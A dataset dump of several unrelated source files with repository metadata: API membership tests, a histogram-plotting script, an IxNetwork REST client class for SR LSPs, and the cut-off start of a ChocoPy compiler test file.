headers=auth_client_header,
expect_errors=True,
)
assert res.status_code == 404
def test_it_returns_404_if_missing_auth(self, app, user, group):
res = app.post_json(
"/api/groups/{pubid}/members/{userid}".format(
pubid=group.pubid, userid=user.userid
),
expect_errors=True,
)
assert res.status_code == 404
def test_it_returns_404_with_token_auth(self, app, token_auth_header, user, group):
res = app.post_json(
"/api/groups/{pubid}/members/{userid}".format(
pubid=group.pubid, userid=user.userid
),
headers=token_auth_header,
expect_errors=True,
)
assert res.status_code == 404
class TestRemoveMember:
def test_it_removes_authed_user_from_group(
self, app, group, group_member_with_token
):
group_member, token = group_member_with_token
headers = {
native_str("Authorization"): native_str("Bearer {}".format(token.value))
}
app.delete("/api/groups/{}/members/me".format(group.pubid), headers=headers)
# We currently have no elegant way to check this via the API, but in a
# future version we should be able to make a GET request here for the
# group information and check it 404s
assert group_member not in group.members
@pytest.fixture
def user(db_session, factories):
user = factories.User(authority="example.com")
db_session.commit()
return user
@pytest.fixture
def third_party_user(db_session, factories):
user = factories.User(authority="thirdparty.com")
db_session.commit()
return user
@pytest.fixture
def auth_client(db_session, factories):
auth_client = factories.ConfidentialAuthClient(
authority="thirdparty.com", grant_type=GrantType.client_credentials
)
db_session.commit()
return auth_client
@pytest.fixture
def auth_client_header(auth_client):
user_pass = "{client_id}:{secret}".format(
client_id=auth_client.id, secret=auth_client.secret
)
encoded = base64.standard_b64encode(user_pass.encode("utf-8"))
return {
native_str("Authorization"): native_str(
"Basic {creds}".format(creds=encoded.decode("ascii"))
)
}
@pytest.fixture
def group(db_session, factories):
group = factories.Group()
db_session.commit()
return group
@pytest.fixture
def third_party_group(db_session, factories):
group = factories.Group(authority="thirdparty.com")
db_session.commit()
return group
@pytest.fixture
def group_member(group, db_session, factories):
user = factories.User()
group.members.append(user)
db_session.commit()
return user
@pytest.fixture
def group_member_with_token(group_member, db_session, factories):
token = factories.DeveloperToken(userid=group_member.userid)
db_session.add(token)
db_session.commit()
return (group_member, token)
@pytest.fixture
def user_with_token(db_session, factories):
user = factories.User()
token = factories.DeveloperToken(userid=user.userid)
db_session.add(token)
db_session.commit()
return (user, token)
@pytest.fixture
def token_auth_header(user_with_token):
user, token = user_with_token
return {native_str("Authorization"): native_str("Bearer {}".format(token.value))}
|
[
"[email protected]"
] | |
accd25f62f52cf65f8c258e2dcce607d5f25fb6f
|
1db2e2238b4ef9c1b6ca3b99508693ee254d6904
|
/develop/distribution_analysis/get_distribution.py
|
ed2a0fbe5958631f1fe4ab77686f8e4032248c97
|
[] |
no_license
|
pgreisen/pythonscripts
|
8674e08095f76edf08ef2059300349218079724c
|
0aadf8f96d19b306c1bc44a772e766a06fe3408b
|
refs/heads/master
| 2021-07-06T23:54:57.774342 | 2021-06-08T19:36:36 | 2021-06-08T19:36:36 | 22,017,192 | 3 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,090 |
py
|
#!/usr/bin/env python
import os,shutil
from optparse import OptionParser
from pylab import *
from numpy import mean,median
def read_file(filename):
f = open(filename,'r')
number = [float(number.strip('\n')) for number in f.readlines() ]
f.close()
return number
def concatenate_lists(a,b):
c = a+b
return c
def main():
parser = OptionParser()
parser.add_option('-f',dest='datafile',
help='Datafile')
parser.add_option('-l',dest='list_of_datafiles',
help='List containing naming of data files')
parser.add_option('-c',dest='concatenate',
help='Should all the data be pooled together')
(options,args) = parser.parse_args()
# String of atom names from the ligand to be aligned with
# Set the path to the pdb file
datafile = options.datafile
list_of_datafiles = options.list_of_datafiles
total_data = []
    concatenate = options.concatenate is not None  # pool the data when -c is given
    if datafile is not None:
datafile = read_file(datafile)
hist(datafile,100,normed=1)
savefig('histogram.png')
# Multiple disitrbution plot
    elif list_of_datafiles is not None:
fl_list = open(list_of_datafiles,'r')
f = [f.strip('\n') for f in fl_list.readlines() ]
fl_list.close()
        if concatenate:
for ln in f:
datafile = read_file(ln)
total_data = concatenate_lists(total_data,datafile)
hist(total_data,100,normed=1)
savefig('histogram.png')
else:
dummy = 0
dataset = []
for ln in f:
dataset.append(read_file(ln))
print "The mean is ", round(mean(dataset[dummy]),3)
print "The median is ",round(median(dataset[dummy]),3)
hist(dataset[dummy],100,normed=1)
dummy = dummy + 1
        savefig('multiple_histogram.png')
if __name__ == "__main__":
main()
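# Example invocations (assumptions inferred from the option parser above):
#   python get_distribution.py -f values.txt           # -> histogram.png
#   python get_distribution.py -l filelist.txt -c 1    # -> pooled histogram.png
#   python get_distribution.py -l filelist.txt         # -> multiple_histogram.png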
|
[
"[email protected]"
] | |
c5b4671a761c6af7544aae60e57748091d6e641f
|
3ae62276c9aad8b9612d3073679b5cf3cb695e38
|
/easyleetcode/leetcodes/Leetcode_213_House_Robber_II.py
|
f210ce27974ff699d546d9fb5f11a1086db6058f
|
[
"Apache-2.0"
] |
permissive
|
gongtian1234/easy_leetcode
|
bc0b33c3c4f61d58a6111d76707903efe0510cb4
|
d2b8eb5d2cafc71ee1ca633ce489c1a52bcc39ce
|
refs/heads/master
| 2022-11-16T17:48:33.596752 | 2020-07-13T02:55:03 | 2020-07-13T02:55:03 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 37 |
py
|
print('Leetcode_213_House_Robber_II')
|
[
"[email protected]"
] | |
4bc615c074f5f315a13727627a9fbd705146dd93
|
d12b59b33df5c467abf081d48e043dac70cc5a9c
|
/uhd_restpy/testplatform/sessions/ixnetwork/topology/preestablishedsrlsps_a4b5c388b0a9f1cd18fdc396c2ea1c6a.py
|
d73f4a92ca5ad2273cd9359313bf53df714b30be
|
[
"MIT"
] |
permissive
|
ajbalogh/ixnetwork_restpy
|
59ce20b88c1f99f95a980ff01106bda8f4ad5a0f
|
60a107e84fd8c1a32e24500259738e11740069fd
|
refs/heads/master
| 2023-04-02T22:01:51.088515 | 2021-04-09T18:39:28 | 2021-04-09T18:39:28 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 29,392 |
py
|
# MIT LICENSE
#
# Copyright 1997 - 2020 by IXIA Keysight
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from uhd_restpy.base import Base
from uhd_restpy.files import Files
class PreEstablishedSrLsps(Base):
"""Pre-Established SR LSPs
The PreEstablishedSrLsps class encapsulates a required preEstablishedSrLsps resource which will be retrieved from the server every time the property is accessed.
"""
__slots__ = ()
_SDM_NAME = 'preEstablishedSrLsps'
_SDM_ATT_MAP = {
'Active': 'active',
'ActiveDataTrafficEndpoint': 'activeDataTrafficEndpoint',
'AssociationId': 'associationId',
'Bandwidth': 'bandwidth',
'BindingType': 'bindingType',
'Bos': 'bos',
'Count': 'count',
'DescriptiveName': 'descriptiveName',
'DestinationIpv4Address': 'destinationIpv4Address',
'ExcludeAny': 'excludeAny',
'HoldingPriority': 'holdingPriority',
'IncludeAll': 'includeAll',
'IncludeAny': 'includeAny',
'IncludeBandwidth': 'includeBandwidth',
'IncludeConfiguredERO': 'includeConfiguredERO',
'IncludeEro': 'includeEro',
'IncludeLsp': 'includeLsp',
'IncludeLspa': 'includeLspa',
'IncludeMetric': 'includeMetric',
'IncludePpag': 'includePpag',
'IncludeSrp': 'includeSrp',
'IncludeSymbolicPathNameTlv': 'includeSymbolicPathNameTlv',
'IncludeTEPathBindingTLV': 'includeTEPathBindingTLV',
'InitialDelegation': 'initialDelegation',
'InsertIpv6ExplicitNull': 'insertIpv6ExplicitNull',
'LocalProtection': 'localProtection',
'LspDelegationState': 'lspDelegationState',
'MplsLabel': 'mplsLabel',
'Name': 'name',
'NumberOfEroSubObjects': 'numberOfEroSubObjects',
'NumberOfMetricSubObject': 'numberOfMetricSubObject',
'OverridePlspId': 'overridePlspId',
'PlspId': 'plspId',
'ProtectionLspBit': 'protectionLspBit',
'ReDelegationTimerStatus': 'reDelegationTimerStatus',
'RedelegationTimeoutInterval': 'redelegationTimeoutInterval',
'SetupPriority': 'setupPriority',
'SrcEndPointIpv4': 'srcEndPointIpv4',
'SrcEndPointIpv6': 'srcEndPointIpv6',
'Srv6SID': 'srv6SID',
'StandbyLspBit': 'standbyLspBit',
'SymbolicPathName': 'symbolicPathName',
'Tc': 'tc',
'Ttl': 'ttl',
}
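    # _SDM_ATT_MAP translates the Python property names above into the
    # attribute names used on the wire; the inherited _get_attribute() /
    # _set_attribute() helpers consult this table when talking to the REST API.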
def __init__(self, parent):
super(PreEstablishedSrLsps, self).__init__(parent)
@property
def PcepEroSubObjectsList(self):
"""
Returns
-------
- obj(uhd_restpy.testplatform.sessions.ixnetwork.topology.pceperosubobjectslist_7ea27079d1a1d53cebc6e1e83b2ca0b4.PcepEroSubObjectsList): An instance of the PcepEroSubObjectsList class
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
from uhd_restpy.testplatform.sessions.ixnetwork.topology.pceperosubobjectslist_7ea27079d1a1d53cebc6e1e83b2ca0b4 import PcepEroSubObjectsList
return PcepEroSubObjectsList(self)
@property
def PcepMetricSubObjectsList(self):
"""
Returns
-------
- obj(uhd_restpy.testplatform.sessions.ixnetwork.topology.pcepmetricsubobjectslist_b1398d82dd25e8e98d50662ebf5ba3d1.PcepMetricSubObjectsList): An instance of the PcepMetricSubObjectsList class
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
from uhd_restpy.testplatform.sessions.ixnetwork.topology.pcepmetricsubobjectslist_b1398d82dd25e8e98d50662ebf5ba3d1 import PcepMetricSubObjectsList
return PcepMetricSubObjectsList(self)
@property
def Tag(self):
"""
Returns
-------
- obj(uhd_restpy.testplatform.sessions.ixnetwork.topology.tag_e30f24de79247381d4dfd423b2f6986d.Tag): An instance of the Tag class
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
from uhd_restpy.testplatform.sessions.ixnetwork.topology.tag_e30f24de79247381d4dfd423b2f6986d import Tag
return Tag(self)
@property
def Active(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Activate/Deactivate Configuration.
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['Active']))
@property
def ActiveDataTrafficEndpoint(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Specifies whether that specific Data Traffic Endpoint will generate data traffic
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ActiveDataTrafficEndpoint']))
@property
def AssociationId(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): The Association ID of this LSP.
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['AssociationId']))
@property
def Bandwidth(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Bandwidth (bits/sec)
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['Bandwidth']))
@property
def BindingType(self):
"""
Returns
-------
        - obj(uhd_restpy.multivalue.Multivalue): Indicates the type of binding included in the TLV. Types are as follows: 20bit MPLS Label, 32bit MPLS Label, SRv6 SID. Default value is 20bit MPLS Label.
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['BindingType']))
@property
def Bos(self):
"""
Returns
-------
        - obj(uhd_restpy.multivalue.Multivalue): This bit is set to True for the last entry in the label stack, i.e., for the bottom of the stack, and False for all other label stack entries. This control will be editable only if Binding Type is MPLS Label 32bit.
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['Bos']))
@property
def Count(self):
"""
Returns
-------
- number: Number of elements inside associated multiplier-scaled container object, e.g. number of devices inside a Device Group.
"""
return self._get_attribute(self._SDM_ATT_MAP['Count'])
@property
def DescriptiveName(self):
"""
Returns
-------
- str: Longer, more descriptive name for element. It's not guaranteed to be unique like -name-, but may offer more context.
"""
return self._get_attribute(self._SDM_ATT_MAP['DescriptiveName'])
@property
def DestinationIpv4Address(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Destination IPv4 Address
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['DestinationIpv4Address']))
@property
def ExcludeAny(self):
"""
Returns
-------
        - obj(uhd_restpy.multivalue.Multivalue): This is a type of Resource Affinity Procedure that is used to validate a link. This control excludes a link from consideration if the link carries any of the attributes in the set.
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ExcludeAny']))
@property
def HoldingPriority(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): The priority of the LSP with respect to holding resources. The value 0 is the highest priority. Holding Priority is used in deciding whether this session can be preempted by another session.
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['HoldingPriority']))
@property
def IncludeAll(self):
"""
Returns
-------
        - obj(uhd_restpy.multivalue.Multivalue): This is a type of Resource Affinity Procedure that is used to validate a link. This control accepts a link only if the link carries all of the attributes in the set.
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['IncludeAll']))
@property
def IncludeAny(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): This is a type of Resource Affinity Procedure that is used to validate a link. This control accepts a link if the link carries any of the attributes in the set.
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['IncludeAny']))
@property
def IncludeBandwidth(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Indicates whether Bandwidth will be included in a PCInitiate message. All other attributes in sub-tab-Bandwidth would be editable only if this checkbox is enabled.
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['IncludeBandwidth']))
@property
def IncludeConfiguredERO(self):
"""
Returns
-------
        - obj(uhd_restpy.multivalue.Multivalue): If this is enabled, the entire ERO goes out in the packet even when a Binding SID is present, meaning no SR-ERO/SRv6-ERO validation is done.
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['IncludeConfiguredERO']))
@property
def IncludeEro(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Specifies whether ERO is active or inactive. All subsequent attributes of the sub-tab-ERO would be editable only if this is enabled.
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['IncludeEro']))
@property
def IncludeLsp(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Indicates whether LSP will be included in a PCInitiate message. All other attributes in sub-tab-LSP would be editable only if this checkbox is enabled.
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['IncludeLsp']))
@property
def IncludeLspa(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Indicates whether LSPA will be included in a PCInitiate message. All other attributes in sub-tab-LSPA would be editable only if this checkbox is enabled.
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['IncludeLspa']))
@property
def IncludeMetric(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Indicates whether the PCInitiate message will have the metric list that is configured. All subsequent attributes of the sub-tab-Metric would be editable only if this is enabled.
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['IncludeMetric']))
@property
def IncludePpag(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Indicates whether Association will be included in a Sync PCReport message. All other attributes in sub-tab-PPAG would be editable only if this checkbox is enabled.
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['IncludePpag']))
@property
def IncludeSrp(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Indicates whether SRP object will be included in a PCInitiate message. All other attributes in sub-tab-SRP would be editable only if this checkbox is enabled.
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['IncludeSrp']))
@property
def IncludeSymbolicPathNameTlv(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Indicates if Symbolic-Path-Name TLV is to be included in PCInitiate message.
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['IncludeSymbolicPathNameTlv']))
@property
def IncludeTEPathBindingTLV(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Indicates if TE-PATH-BINDING TLV is to be included in PCC Sync LSP.
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['IncludeTEPathBindingTLV']))
@property
def InitialDelegation(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Initial Delegation
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['InitialDelegation']))
@property
def InsertIpv6ExplicitNull(self):
"""
Returns
-------
- bool: Insert IPv6 Explicit Null MPLS header if the traffic type is of type IPv6
"""
return self._get_attribute(self._SDM_ATT_MAP['InsertIpv6ExplicitNull'])
@InsertIpv6ExplicitNull.setter
def InsertIpv6ExplicitNull(self, value):
self._set_attribute(self._SDM_ATT_MAP['InsertIpv6ExplicitNull'], value)
@property
def LocalProtection(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): When set, this means that the path must include links protected with Fast Reroute
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['LocalProtection']))
@property
def LspDelegationState(self):
"""
Returns
-------
- list(str[delegated | delegationConfirmed | delegationRejected | delegationReturned | delegationRevoked | nonDelegated | none]): LSP Delegation State
"""
return self._get_attribute(self._SDM_ATT_MAP['LspDelegationState'])
@property
def MplsLabel(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): This control will be editable if the Binding Type is set to either 20bit or 32bit MPLS-Label. This field will take the 20bit value of the MPLS-Label
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['MplsLabel']))
@property
def Name(self):
"""
Returns
-------
- str: Name of NGPF element, guaranteed to be unique in Scenario
"""
return self._get_attribute(self._SDM_ATT_MAP['Name'])
@Name.setter
def Name(self, value):
self._set_attribute(self._SDM_ATT_MAP['Name'], value)
@property
def NumberOfEroSubObjects(self):
"""
Returns
-------
- number: Value that indicates the number of ERO Sub Objects to be configured.
"""
return self._get_attribute(self._SDM_ATT_MAP['NumberOfEroSubObjects'])
@NumberOfEroSubObjects.setter
def NumberOfEroSubObjects(self, value):
self._set_attribute(self._SDM_ATT_MAP['NumberOfEroSubObjects'], value)
@property
def NumberOfMetricSubObject(self):
"""
Returns
-------
- number: Value that indicates the number of Metric Objects to be configured.
"""
return self._get_attribute(self._SDM_ATT_MAP['NumberOfMetricSubObject'])
@NumberOfMetricSubObject.setter
def NumberOfMetricSubObject(self, value):
self._set_attribute(self._SDM_ATT_MAP['NumberOfMetricSubObject'], value)
@property
def OverridePlspId(self):
"""
Returns
-------
        - bool: Indicates if the PLSP-ID will be set by the state machine or by the user. If disabled, the user won't have control and the state machine will set it.
"""
return self._get_attribute(self._SDM_ATT_MAP['OverridePlspId'])
@OverridePlspId.setter
def OverridePlspId(self, value):
self._set_attribute(self._SDM_ATT_MAP['OverridePlspId'], value)
@property
def PlspId(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): An identifier for the LSP. A PCC creates a unique PLSP-ID for each LSP that is constant for the lifetime of a PCEP session. The PCC will advertise the same PLSP-ID on all PCEP sessions it maintains at a given time.
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['PlspId']))
@property
def ProtectionLspBit(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Indicates whether Protection LSP Bit is On.
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ProtectionLspBit']))
@property
def ReDelegationTimerStatus(self):
"""
Returns
-------
- list(str[expired | none | notStarted | running | stopped]): Re-Delegation Timer Status
"""
return self._get_attribute(self._SDM_ATT_MAP['ReDelegationTimerStatus'])
@property
def RedelegationTimeoutInterval(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): The period of time a PCC waits for, when a PCEP session is terminated, before revoking LSP delegation to a PCE and attempting to redelegate LSPs associated with the terminated PCEP session to PCE.
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['RedelegationTimeoutInterval']))
@property
def SetupPriority(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): The priority of the LSP with respect to taking resources.The value 0 is the highest priority.The Setup Priority is used in deciding whether this session can preempt another session.
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SetupPriority']))
@property
def SrcEndPointIpv4(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Source IPv4 address
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SrcEndPointIpv4']))
@property
def SrcEndPointIpv6(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Source IPv6 address
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SrcEndPointIpv6']))
@property
def Srv6SID(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): SRv6 SID with a format of a 16 byte IPv6 address.
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['Srv6SID']))
@property
def StandbyLspBit(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Indicates whether Standby LSP Bit is On.
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['StandbyLspBit']))
@property
def SymbolicPathName(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Each LSP (path) must have a symbolic name that is unique in the PCC. It must remain constant throughout a path's lifetime, which may span across multiple consecutive PCEP sessions and/or PCC restarts.
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SymbolicPathName']))
@property
def Tc(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): This field is used to carry traffic class information. This control will be editable only if Binding Type is MPLS Label 32bit.
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['Tc']))
@property
def Ttl(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): This field is used to encode a time-to-live value. This control will be editable only if Binding Type is MPLS Label 32bit.
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['Ttl']))
def update(self, InsertIpv6ExplicitNull=None, Name=None, NumberOfEroSubObjects=None, NumberOfMetricSubObject=None, OverridePlspId=None):
"""Updates preEstablishedSrLsps resource on the server.
This method has some named parameters with a type: obj (Multivalue).
The Multivalue class has documentation that details the possible values for those named parameters.
Args
----
- InsertIpv6ExplicitNull (bool): Insert IPv6 Explicit Null MPLS header if the traffic type is of type IPv6
- Name (str): Name of NGPF element, guaranteed to be unique in Scenario
- NumberOfEroSubObjects (number): Value that indicates the number of ERO Sub Objects to be configured.
- NumberOfMetricSubObject (number): Value that indicates the number of Metric Objects to be configured.
        - OverridePlspId (bool): Indicates if the PLSP-ID will be set by the state machine or by the user. If disabled, the user won't have control and the state machine will set it.
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._update(self._map_locals(self._SDM_ATT_MAP, locals()))
def get_device_ids(self, PortNames=None, Active=None, ActiveDataTrafficEndpoint=None, AssociationId=None, Bandwidth=None, BindingType=None, Bos=None, DestinationIpv4Address=None, ExcludeAny=None, HoldingPriority=None, IncludeAll=None, IncludeAny=None, IncludeBandwidth=None, IncludeConfiguredERO=None, IncludeEro=None, IncludeLsp=None, IncludeLspa=None, IncludeMetric=None, IncludePpag=None, IncludeSrp=None, IncludeSymbolicPathNameTlv=None, IncludeTEPathBindingTLV=None, InitialDelegation=None, LocalProtection=None, MplsLabel=None, PlspId=None, ProtectionLspBit=None, RedelegationTimeoutInterval=None, SetupPriority=None, SrcEndPointIpv4=None, SrcEndPointIpv6=None, Srv6SID=None, StandbyLspBit=None, SymbolicPathName=None, Tc=None, Ttl=None):
"""Base class infrastructure that gets a list of preEstablishedSrLsps device ids encapsulated by this object.
Use the optional regex parameters in the method to refine the list of device ids encapsulated by this object.
Args
----
- PortNames (str): optional regex of port names
- Active (str): optional regex of active
- ActiveDataTrafficEndpoint (str): optional regex of activeDataTrafficEndpoint
- AssociationId (str): optional regex of associationId
- Bandwidth (str): optional regex of bandwidth
- BindingType (str): optional regex of bindingType
- Bos (str): optional regex of bos
- DestinationIpv4Address (str): optional regex of destinationIpv4Address
- ExcludeAny (str): optional regex of excludeAny
- HoldingPriority (str): optional regex of holdingPriority
- IncludeAll (str): optional regex of includeAll
- IncludeAny (str): optional regex of includeAny
- IncludeBandwidth (str): optional regex of includeBandwidth
- IncludeConfiguredERO (str): optional regex of includeConfiguredERO
- IncludeEro (str): optional regex of includeEro
- IncludeLsp (str): optional regex of includeLsp
- IncludeLspa (str): optional regex of includeLspa
- IncludeMetric (str): optional regex of includeMetric
- IncludePpag (str): optional regex of includePpag
- IncludeSrp (str): optional regex of includeSrp
- IncludeSymbolicPathNameTlv (str): optional regex of includeSymbolicPathNameTlv
- IncludeTEPathBindingTLV (str): optional regex of includeTEPathBindingTLV
- InitialDelegation (str): optional regex of initialDelegation
- LocalProtection (str): optional regex of localProtection
- MplsLabel (str): optional regex of mplsLabel
- PlspId (str): optional regex of plspId
- ProtectionLspBit (str): optional regex of protectionLspBit
- RedelegationTimeoutInterval (str): optional regex of redelegationTimeoutInterval
- SetupPriority (str): optional regex of setupPriority
- SrcEndPointIpv4 (str): optional regex of srcEndPointIpv4
- SrcEndPointIpv6 (str): optional regex of srcEndPointIpv6
- Srv6SID (str): optional regex of srv6SID
- StandbyLspBit (str): optional regex of standbyLspBit
- SymbolicPathName (str): optional regex of symbolicPathName
- Tc (str): optional regex of tc
- Ttl (str): optional regex of ttl
Returns
-------
- list(int): A list of device ids that meets the regex criteria provided in the method parameters
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._get_ngpf_device_ids(locals())
def Delegate(self, *args, **kwargs):
"""Executes the delegate operation on the server.
Delegate
delegate(Arg2=list)list
-----------------------
- Arg2 (list(number)): List of indices into the protocol plugin. An empty list indicates all instances in the plugin.
- Returns list(str): ID to associate each async action invocation
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self.href }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('delegate', payload=payload, response_object=None)
def RevokeDelegation(self, *args, **kwargs):
"""Executes the revokeDelegation operation on the server.
Revoke Delegation
revokeDelegation(Arg2=list)list
-------------------------------
- Arg2 (list(number)): List of indices into the protocol plugin. An empty list indicates all instances in the plugin.
- Returns list(str): ID to associate each async action invocation
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self.href }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('revokeDelegation', payload=payload, response_object=None)
|
[
"[email protected]"
] | |
660fd07c01c4368f378757845806f9d59a1de5e9
|
c9ddbdb5678ba6e1c5c7e64adf2802ca16df778c
|
/cases/synthetic/coverage-big-588.py
|
49fb3b0216e86538276574a294695124bdcfd458
|
[] |
no_license
|
Virtlink/ccbench-chocopy
|
c3f7f6af6349aff6503196f727ef89f210a1eac8
|
c7efae43bf32696ee2b2ee781bdfe4f7730dec3f
|
refs/heads/main
| 2023-04-07T15:07:12.464038 | 2022-02-03T15:42:39 | 2022-02-03T15:42:39 | 451,969,776 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 13,355 |
py
|
count:int = 0
count2:int = 0
count3:int = 0
count4:int = 0
count5:int = 0
def foo(s: str) -> int:
return len(s)
def foo2(s: str, s2: str) -> int:
return len(s)
def foo3(s: str, s2: str, s3: str) -> int:
return len(s)
def foo4(s: str, s2: str, s3: str, s4: str) -> int:
return len(s)
def foo5(s: str, s2: str, s3: str, s4: str, s5: str) -> int:
return len(s)
class bar(object):
p: bool = True
def baz(self:"bar", xx: [int]) -> str:
global count
